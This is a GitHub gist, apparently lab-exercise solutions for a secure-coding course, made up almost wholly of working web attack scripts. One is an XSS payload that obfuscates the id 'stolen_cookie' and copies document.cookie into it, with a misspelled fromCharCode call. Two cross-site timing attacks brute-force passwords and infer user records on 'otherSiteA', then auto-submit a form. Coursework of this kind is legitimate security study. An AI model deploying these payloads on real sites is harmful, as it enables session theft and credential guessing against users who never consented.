Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
secure coding code
<script>
var id = String.fromCharcode([115, 116, 111, 108, 101, 110, 95, 99, 111, 111, 107, 105, 101]);
document.getElementById(id).value = document.cookie;
</script>
// Timing Attack # 1
function checkPwd(passwd) {
var start_time = new Date().getTime();
$.ajax({
type:"POST",
url:"http://otherSiteA/exercises/mixingContent/authLvl1.php?pass=" + passwd,
success: function() {
alert(passwd + " succeed");
},
error: function (xhr, status, error) {
var end_time = new Date().getTime();
if (end_time - start_time >= 1000) {
console.log(passwd);
}
}
});
}
passwords.forEach(function (passwd) {
checkPwd(passwd);
});
// Timing Attack # 2
$(document).ready(function () {
var counter = 1;
var img = document.getElementById("useMe");
function checkUserRec(idx) {
if (idx >= 32) return;
var uname = $("#name"+idx)[0].innerHTML;
console.log($("#name"+idx));
var checkbox = "#check" + idx;
var start_time = new Date().getTime();
img.src = "http://otherSiteA/exercises/mixingContent/authLvl2.php?name=" + uname;
img.onload = function () {
console.log("image loaded");
};
img.onerror = function () {
var end_time = new Date().getTime();
if (end_time - start_time < 1000) {
console.log(uname + " is checked; ", end_time-start_time);
$(checkbox).prop("checked", true);
} else {
// ignore
}
counter += 1;
if (counter == 33) {
// all finished
$("form")[0].submit();
}
checkUserRec(idx+1);
};
}
checkUserRec(0);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment